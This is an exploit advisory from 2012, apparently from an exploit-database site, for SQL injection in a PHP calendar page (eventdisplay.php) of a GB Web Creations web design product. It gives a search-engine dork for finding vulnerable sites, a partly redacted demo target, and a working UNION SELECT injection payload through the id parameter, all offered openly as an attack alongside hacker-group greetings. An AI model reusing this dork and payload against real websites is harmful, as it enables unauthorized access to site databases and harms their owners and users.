Vermont Web Design SQL Injection

2012.04.21

Credit: Th4 MasK

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: Powered By GB Web Creations

########################################################
~ Exploit Title: * Vermont Web Desing SQL Injecktion *~ 
~ Author: Th4 MasK 
~ Vendor : http://www.gbwebcreations.com/ 
~ Date : 21.04.2012 ~ 

~ Platform : Php ~
~ Dork       :  Powered By GB Web Creations

//

~ Demo Site :


 http://www.xxxxxxxxxxxxxxxxxxxxxxxxxxx.org/calendar/eventdisplay.php?&id=38[SQL]

Exploit  ; 


http:/localhost/calendar/eventdisplay.php?&id=38/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/@@version,/**/2,/**/3--


************************************************
* Greetz: http://th4mask.blogspot.com ~ DarkDevilZ.iN *
* Contact to ; th4_mask[at]windowslive.com                *
* Darkness Devil,DeaDSLayeR,MuHuR,Evillord,Karatay   *
************************************************* 		 	   		  

References:

http://www.gbwebcreations.com/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Vermont Web Design SQL Injection

Dork: Powered By GB Web Creations

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.